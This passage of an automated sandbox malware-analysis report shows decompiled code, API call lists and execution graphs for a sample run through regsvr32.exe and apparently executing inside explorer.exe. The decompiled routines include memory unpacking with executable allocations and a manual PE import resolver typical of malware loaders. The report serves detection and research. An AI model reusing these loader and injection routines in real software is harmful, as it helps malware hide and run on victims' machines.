				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0xde6f4; // 0x1d4
				_t12 = E000CA4BF(_t38, 0);
				while(_t12 < 0) {
					E000C980C( &_v28);
					_t40 =  *0xde700; // 0x0
					_t14 =  *0xde704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0xde684; // 0x64f8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0xde6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0xde684; // 0x64f8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0xde6f4; // 0x1d4
								__eflags = 0;
								_t12 = E000CA4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E000C980C(0xde700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0xde6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0xde6e8; // 0x64ffd0
				_v28 = _t24;
				_t61 = E000C1A1B( &_v28, E000C131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0xde760);
					_t48 = 0x27;
					E000C9F06(_t48);
				}
				if(_v24 != 0) {
					E000C6890( &_v24);
				}
				_t26 =  *0xde684; // 0x64f8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0xde6ec);
				_t28 =  *0xde758; // 0x0
				 *0xde6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0xde6f4; // 0x1d4
				 *0xde758 =  !=  ? 1 : _t28;
				E000CA4DB(_t46);
				_t15 = _t61;
				goto L12;
			}
























        0x000c1b2d
        0x000c1b33
        0x000c1b41
        0x000c1baf
        0x000c1b4e
        0x000c1b53
        0x000c1b59
        0x000c1b5e
        0x000c1b64
        0x000c1b66
        0x000c1b6a
        0x000c1c64
        0x000c1c64
        0x000c1b70
        0x000c1b70
        0x000c1b7c
        0x000c1b7c
        0x000c1b88
        0x000c1b8e
        0x000c1b90
        0x00000000
        0x000c1b92
        0x000c1b92
        0x000c1b9c
        0x000c1ba2
        0x000c1ba8
        0x000c1baa
        0x00000000
        0x000c1baa
        0x000c1b72
        0x000c1b72
        0x000c1b76
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000c1b76
        0x000c1b70
        0x000c1c5d
        0x000c1c63
        0x000c1c63
        0x000c1bb8
        0x000c1bcc
        0x000c1bcf
        0x000c1bd9
        0x000c1be5
        0x000c1bef
        0x000c1bf0
        0x000c1bf1
        0x000c1bf2
        0x000c1bf7
        0x000c1c00
        0x000c1c04
        0x000c1c06
        0x000c1c07
        0x000c1c0f
        0x000c1c10
        0x000c1c16
        0x000c1c1b
        0x000c1c21
        0x000c1c21
        0x000c1c26
        0x000c1c31
        0x000c1c34
        0x000c1c3c
        0x000c1c48
        0x000c1c4b
        0x000c1c51
        0x000c1c56
        0x000c1c5b
        0x00000000

        APIs
        • GetCurrentProcess.KERNEL32(000DE6EC,00000000,00000000,00000002), ref: 000C1BCC
        • GetCurrentThread.KERNEL32(00000000), ref: 000C1BCF
        • GetCurrentProcess.KERNEL32(00000000), ref: 000C1BD6
        • DuplicateHandle.KERNEL32 ref: 000C1BD9
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: Current$Process$DuplicateHandleThread
        • String ID:
        • API String ID: 3566409357-0
        • Opcode ID: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
        • Instruction ID: 2b5b3560eca2b9c66e54fa8514e9480b8e1ea27dea2e81419eb01e222fcba38a
        • Opcode Fuzzy Hash: 7432552202618214ff09496dd892babb79cb5ed6e1a56431ae5e527e25d11dc9
        • Instruction Fuzzy Hash: C831A6716053419FE744FF64EC89EAE77A4EB55390B00456EF9018B2A3DA38DC04CB72
        Uniqueness

        Uniqueness Score: -1.00%

        Analysis Process: regsvr32.exe PID: 1724 Parent PID: 2428 regsvr32.exeCOMMON

        Execution Graph

        Execution Coverage:2%
        Dynamic/Decrypted Code Coverage:100%
        Signature Coverage:0%
        Total number of Nodes:41
        Total number of Limit Nodes:2

        Graph

        execution_graph 1290 10028d00 1291 10028d1a GetSystemDirectoryW 1290->1291 1293 10028e02 VirtualProtectEx 1291->1293 1294 10028df5 1291->1294 1295 10028e3a GetSystemDirectoryW 1293->1295 1294->1293 1297 10028f59 1295->1297 1327 10029240 1328 1002927c GetWindowsDirectoryW 1327->1328 1330 10029341 1328->1330 1331 10029660 GetProcessHeap RtlAllocateHeap 1332 1002969c 1331->1332 1337 10029b30 GetWindowsDirectoryW 1338 10029bc0 FindFirstChangeNotificationW 1337->1338 1339 10029bab 1337->1339 1340 10029bf3 1338->1340 1339->1338 1333 10028ef6 1334 10028f00 GetSystemDirectoryW 1333->1334 1336 10028f59 1334->1336 1298 10077380 1300 1007738a 1298->1300 1301 100773ab 1300->1301 1303 1007792e 1301->1303 1304 10077973 1303->1304 1305 10077a0f VirtualAlloc 1304->1305 1306 100779d1 VirtualAlloc 1304->1306 1307 10077a55 1305->1307 1306->1305 1308 10077a6e VirtualAlloc 1307->1308 1323 100775dd 1308->1323 1311 10077ad7 1312 10077ba8 VirtualProtect 1311->1312 1313 10077bc7 1312->1313 1315 10077bfa 1312->1315 1314 10077bd5 VirtualProtect 1313->1314 1313->1315 1314->1313 1316 10077c7c VirtualProtect 1315->1316 1317 10077cb7 VirtualProtect 1316->1317 1319 10077d14 VirtualFree GetPEB 1317->1319 1320 10077d40 1319->1320 1325 1007785d GetPEB 1320->1325 1322 10077d84 1324 100775ec VirtualFree 1323->1324 1324->1311 1326 1007788d 1325->1326 1326->1322

        Executed Functions

        Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 00000009.00000002.574694043.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_9_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 62 10028d00-10028d18 63 10028d36 62->63 64 10028d1a-10028d34 62->64 65 10028d3c-10028d4d 63->65 64->65 66 10028d6b-10028d72 65->66 67 10028d4f-10028d69 65->67 68 10028d78-10028d9f 66->68 67->68 69 10028da1-10028db4 68->69 70 10028db6-10028dc6 68->70 71 10028dcc-10028df3 GetSystemDirectoryW 69->71 70->71 72 10028e02-10028e38 VirtualProtectEx 71->72 73 10028df5-10028dfd 71->73 74 10028e54-10028e85 72->74 75 10028e3a-10028e4e 72->75 73->72 76 10028ea0-10028ec3 74->76 77 10028e87-10028e9b 74->77 75->74 78 10028ec5-10028eda 76->78 79 10028edd-10028ef4 76->79 77->76 78->79 80 10028f00-10028f0b 79->80 81 10028f34-10028f57 GetSystemDirectoryW 80->81 82 10028f0d-10028f2a 80->82 84 10028f75-10028fc0 81->84 85 10028f59-10028f6f 81->85 82->81 83 10028f2c-10028f32 82->83 83->80 83->81 87 10028fc5-10028fc9 84->87 85->84 88 10028fcb-10028fe5 87->88 89 10028fef 87->89 90 10028ff2-10029003 88->90 91 10028fe7-10028fed 88->91 89->90 92 10029005-10029015 90->92 93 10029018-1002902c 90->93 91->87 91->89 92->93 94 10029030-10029039 93->94 95 1002903b-10029057 94->95 96 10029059-1002908b 94->96 95->94 95->96 97 10029090-1002909b 96->97 98 100290cb-100290d4 97->98 99 1002909d-100290c1 97->99 99->98 100 100290c3-100290c9 99->100 100->97 100->98
        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 00000009.00000002.574663098.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 101 10029b30-10029ba9 GetWindowsDirectoryW 102 10029bc0-10029bf1 FindFirstChangeNotificationW 101->102 103 10029bab-10029bb9 101->103 104 10029bf3-10029c06 102->104 105 10029c08-10029c26 102->105 103->102 106 10029c29-10029c30 104->106 105->106 107 10029c32-10029c37 106->107 108 10029c3b-10029c6f 106->108 107->108 110 10029c74-10029c7d 108->110 111 10029c9b-10029cab 110->111 112 10029c7f-10029c99 110->112 113 10029cbc-10029cbe 111->113 114 10029cad-10029cb7 111->114 112->110 112->111 115 10029cc0-10029cd5 113->115 116 10029cd7-10029cec 113->116 114->113 115->116 118 10029cf1-10029cfa 116->118 119 10029d18-10029d47 118->119 120 10029cfc-10029d16 118->120 120->118 120->119
        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 00000009.00000002.574663098.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_9_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Analysis Process: regsvr32.exe PID: 2536 Parent PID: 2960 regsvr32.exeCOMMON

        Executed Functions

        Function 1007792E, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
        Download Yara Rule

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00000814,00003000,00000040,00000814,10077380), ref: 100779EB
        • VirtualAlloc.KERNEL32(00000000,000004CA,00003000,00000040,100773E0), ref: 10077A22
        • VirtualAlloc.KERNEL32(00000000,00028122,00003000,00000040), ref: 10077A82
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077AB8
        • VirtualProtect.KERNEL32(10000000,00000000,00000004,1007790D), ref: 10077BBD
        • VirtualProtect.KERNEL32(10000000,00001000,00000004,1007790D), ref: 10077BE4
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D), ref: 10077CB1
        • VirtualProtect.KERNEL32(00000000,?,00000002,1007790D,?), ref: 10077D07
        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 10077D23
        Memory Dump Source
        • Source File: 0000000C.00000002.582234243.0000000010077000.00000040.00020000.sdmp, Offset: 10077000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_10077000_regsvr32.jbxd
        Similarity
        • API ID: Virtual$Protect$Alloc$Free
        • String ID:
        • API String ID: 2574235972-0
        • Opcode ID: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction ID: e61e719fcc5ffd65f3e7435c319bc58e36d786470a44bd70215d6a9d31556276
        • Opcode Fuzzy Hash: 70a75cfa5ba03345d47f256e82c004e9dc0d4809c604307a2666930abcd254c7
        • Instruction Fuzzy Hash: F8D18D767086009FDB11CF14C8C0B927BA6FF8C750B194599ED6D9F25AD7B4B810CBA4
        Uniqueness

        Uniqueness Score: -1.00%

        Function 10028D00, Relevance: 4.8, APIs: 3, Instructions: 254COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 62 10028d00-10028d18 63 10028d36 62->63 64 10028d1a-10028d34 62->64 65 10028d3c-10028d4d 63->65 64->65 66 10028d6b-10028d72 65->66 67 10028d4f-10028d69 65->67 68 10028d78-10028d9f 66->68 67->68 69 10028da1-10028db4 68->69 70 10028db6-10028dc6 68->70 71 10028dcc-10028df3 GetSystemDirectoryW 69->71 70->71 72 10028e02-10028e38 VirtualProtectEx 71->72 73 10028df5-10028dfd 71->73 74 10028e54-10028e85 72->74 75 10028e3a-10028e4e 72->75 73->72 76 10028ea0-10028ec3 74->76 77 10028e87-10028e9b 74->77 75->74 78 10028ec5-10028eda 76->78 79 10028edd-10028ef4 76->79 77->76 78->79 80 10028f00-10028f0b 79->80 81 10028f34-10028f57 GetSystemDirectoryW 80->81 82 10028f0d-10028f2a 80->82 84 10028f75-10028fc0 81->84 85 10028f59-10028f6f 81->85 82->81 83 10028f2c-10028f32 82->83 83->80 83->81 87 10028fc5-10028fc9 84->87 85->84 88 10028fcb-10028fe5 87->88 89 10028fef 87->89 90 10028ff2-10029003 88->90 91 10028fe7-10028fed 88->91 89->90 92 10029005-10029015 90->92 93 10029018-1002902c 90->93 91->87 91->89 92->93 94 10029030-10029039 93->94 95 1002903b-10029057 94->95 96 10029059-1002908b 94->96 95->94 95->96 97 10029090-1002909b 96->97 98 100290cb-100290d4 97->98 99 1002909d-100290c1 97->99 99->98 100 100290c3-100290c9 99->100 100->97 100->98
        APIs
        • GetSystemDirectoryW.KERNEL32(10076908,00000744), ref: 10028DE1
        • VirtualProtectEx.KERNEL32(000000FF,101159C8,000051F0,00000040,10114064), ref: 10028E25
        Memory Dump Source
        • Source File: 0000000C.00000002.582065156.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: DirectoryProtectSystemVirtual
        • String ID:
        • API String ID: 648172718-0
        • Opcode ID: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction ID: 8567422235b8483302f276b06f5c76c9c9f5ec01d0adbca6e2a98c3bb5a49452
        • Opcode Fuzzy Hash: 4e67b1718750c374d10788d2f48c160aff6023570f1aafa6d89d8890ad6d1c89
        • Instruction Fuzzy Hash: 6AA1D435A046F14FE7349B388DD81E83FB2EB99312B59476AD4C4A72A5D2BE4CC4CB50
        Uniqueness

        Uniqueness Score: -1.00%

        Non-executed Functions

        Function 10029B30, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 101 10029b30-10029ba9 GetWindowsDirectoryW 102 10029bc0-10029bf1 FindFirstChangeNotificationW 101->102 103 10029bab-10029bb9 101->103 104 10029bf3-10029c06 102->104 105 10029c08-10029c26 102->105 103->102 106 10029c29-10029c30 104->106 105->106 107 10029c32-10029c37 106->107 108 10029c3b-10029c6f 106->108 107->108 110 10029c74-10029c7d 108->110 111 10029c9b-10029cab 110->111 112 10029c7f-10029c99 110->112 113 10029cbc-10029cbe 111->113 114 10029cad-10029cb7 111->114 112->110 112->111 115 10029cc0-10029cd5 113->115 116 10029cd7-10029cec 113->116 114->113 115->116 118 10029cf1-10029cfa 116->118 119 10029d18-10029d47 118->119 120 10029cfc-10029d16 118->120 120->118 120->119
        APIs
        • GetWindowsDirectoryW.KERNEL32 ref: 10029B87
        • FindFirstChangeNotificationW.KERNEL32(10114AA8,00000000,00000020), ref: 10029BD2
        Strings
        Memory Dump Source
        • Source File: 0000000C.00000002.582065156.0000000010021000.00000020.00020000.sdmp, Offset: 10021000, based on PE: false
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_12_2_10021000_regsvr32.jbxd
        Similarity
        • API ID: ChangeDirectoryFindFirstNotificationWindows
        • String ID: 1
        • API String ID: 3662519435-2212294583
        • Opcode ID: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction ID: a17468885719ca7b42c6c3de4681764e2a8d7b2457ed512f777c56a051c8a142
        • Opcode Fuzzy Hash: 0b9660a65e4cab3b7e7ad5c03af4bb0263a6bc0f85f4f16362e04827d69aa07f
        • Instruction Fuzzy Hash: 3851CF72A043A08FE335CF28CCC85D677E1EB88302F21472ED58597295D6BAAC85CB81
        Uniqueness

        Uniqueness Score: -1.00%

        Analysis Process: explorer.exe PID: 236 Parent PID: 1724 explorer.exeCOMMON

        Executed Functions

        Function 000CCF84, Relevance: 7.5, APIs: 5, Instructions: 43COMMON
        Download Yara Rule

        Control-flow Graph

        C-Code - Quality: 94%
        			E000CCF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0xde688; // 0xf0000
				GetCurrentProcess();
				_t11 = E000CBA05(); // executed
				_t1 = _t29 + 0x1644; // 0xf1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E000C8FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xf0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E000C8FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E000CE3B6(_t3);
				_t7 = _t29 + 0x220; // 0xf0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E000CE3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}








        0x000ccf87
        0x000ccf89
        0x000ccf90
        0x000ccf98
        0x000ccfa2
        0x000ccfa2
        0x000ccfa8
        0x000ccfb1
        0x000ccfb7
        0x000ccfb9
        0x000ccfbd
        0x000ccfbd
        0x000ccfc2
        0x000ccfc8
        0x000ccfd8
        0x000ccfe2
        0x000ccfea
        0x000ccfed
        0x000ccff9
        0x000ccfff
        0x000cd004
        0x000cd00a
        0x000cd010
        0x000cd016
        0x000cd01e

        APIs
        • GetCurrentProcess.KERNEL32(?,?,000F0000,?,000C3545), ref: 000CCF90
        • GetModuleFileNameW.KERNEL32(00000000,000F1644,00000105,?,?,000F0000,?,000C3545), ref: 000CCFB1
        • memset.MSVCRT ref: 000CCFE2
        • GetVersionExA.KERNEL32(000F0000,000F0000,?,000C3545), ref: 000CCFED
        • GetCurrentProcessId.KERNEL32(?,000C3545), ref: 000CCFF3
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: CurrentProcess$FileModuleNameVersionmemset
        • String ID:
        • API String ID: 3581039275-0
        • Opcode ID: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction ID: 85beb0dd8ed8ae9ed765903e2ec244192ab05f814248cde92d819e8ab3455d73
        • Opcode Fuzzy Hash: ce077deba676a9e204692a8621cf94e2ae9e6113a021fd017ecb45372178f67c
        • Instruction Fuzzy Hash: B6019E709027009BE720AF71D84AFEABBE5EF80300F00082EF85683282EF746505CB64
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000D249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 12 d249b-d24a9 13 d24ab-d24ae 12->13 14 d24b3-d24f3 GetModuleHandleA call ce099 12->14 15 d2660-d2661 13->15 18 d265e 14->18 19 d24f9-d2510 14->19 18->15 20 d2513-d251a 19->20 21 d251c-d2525 20->21 22 d2527-d2537 20->22 21->20 23 d253a-d2541 22->23 23->18 24 d2547-d255e LoadLibraryA 23->24 25 d2568-d256e 24->25 26 d2560-d2563 24->26 27 d257d-d2586 25->27 28 d2570-d257b 25->28 26->15 29 d2589 27->29 28->29 30 d258d-d2593 29->30 31 d2599-d25b1 30->31 32 d2650-d2659 30->32 33 d25d4-d2602 31->33 34 d25b3-d25d2 31->34 32->23 37 d2605-d260b 33->37 34->37 38 d260d-d261b 37->38 39 d2639-d264b 37->39 40 d261d-d262f 38->40 41 d2631-d2637 38->41 39->30 40->39 41->39
        C-Code - Quality: 50%
        			E000D249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E000CE099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























        0x000d24a1
        0x000d24a9
        0x000d24be
        0x000d24d0
        0x000d24dc
        0x000d24e2
        0x000d24e7
        0x000d24f3
        0x000d265e
        0x00000000
        0x000d265e
        0x000d24f9
        0x000d2502
        0x000d2510
        0x000d2513
        0x000d2522
        0x000d2522
        0x000d2529
        0x000d2537
        0x000d253a
        0x000d2551
        0x000d2557
        0x000d255e
        0x000d256e
        0x000d2586
        0x000d2570
        0x000d2578
        0x000d2578
        0x000d2589
        0x000d258d
        0x000d2599
        0x000d259d
        0x000d25a1
        0x000d25a5
        0x000d25b1
        0x000d25dc
        0x000d25e4
        0x000d25f6
        0x000d2602
        0x000d25b3
        0x000d25b8
        0x000d25c3
        0x000d25cf
        0x000d25cf
        0x000d260b
        0x000d2611
        0x000d261b
        0x000d2637
        0x000d261d
        0x000d262c
        0x000d262c
        0x000d261b
        0x000d263f
        0x000d2648
        0x000d2648
        0x000d2656
        0x00000000
        0x000d2656
        0x000d2562
        0x00000000
        0x000d2562
        0x00000000
        0x000d253a
        0x00000000

        APIs
        • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 000D24B8
        • LoadLibraryA.KERNEL32(00000000), ref: 000D2551
        Strings
        Memory Dump Source
        • Source File: 0000000E.00000002.574955741.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_14_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleLibraryLoadModule
        • String ID: GetProcAddress$kernel32.dll
        • API String ID: 4133054770-1584408056
        • Opcode ID: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction ID: deaac39a8f92dcb34ee975fe36824c3fd640916c06a8e948343ef26f76a1822f
        • Opcode Fuzzy Hash: 5b73e45b0ccaba85451fd15043d652342e788a2a1f747586dafaf4a79dd21d9c
        • Instruction Fuzzy Hash: BB619C75900209EFDB50CF98D885BADBBF1FF08315F24859AE815AB391C774AA80DF60
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C61B4, Relevance: 6.1, APIs: 4, Instructions: 145registryCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 42 c61b4-c61f9 memset call c8604 45 c61ff-c6211 call c8604 42->45 46 c6363-c6369 42->46 45->46 49 c6217-c6234 RegOpenKeyExW 45->49 50 c623a-c626d 49->50 51 c6333-c6337 49->51 57 c627f-c6284 50->57 58 c626f-c627a 50->58 52 c6339-c633e 51->52 53 c6344-c6360 call c861a * 2 51->53 52->53 53->46 57->51 60 c628a 57->60 58->51 63 c628d-c62dc memset * 2 60->63 65 c62de-c62ee 63->65 66 c6326-c632d 63->66 68 c62f0-c6304 65->68 69 c6323 65->69 66->51 66->63 68->69 71 c6306-c6313 call cc392 68->71 69->66 74 c631c-c631e call cb1b1 71->74 75 c6315-c6317 71->75 74->69 75->74
        C-Code - Quality: 80%
        			E000C61B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				intOrPtr _t63;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
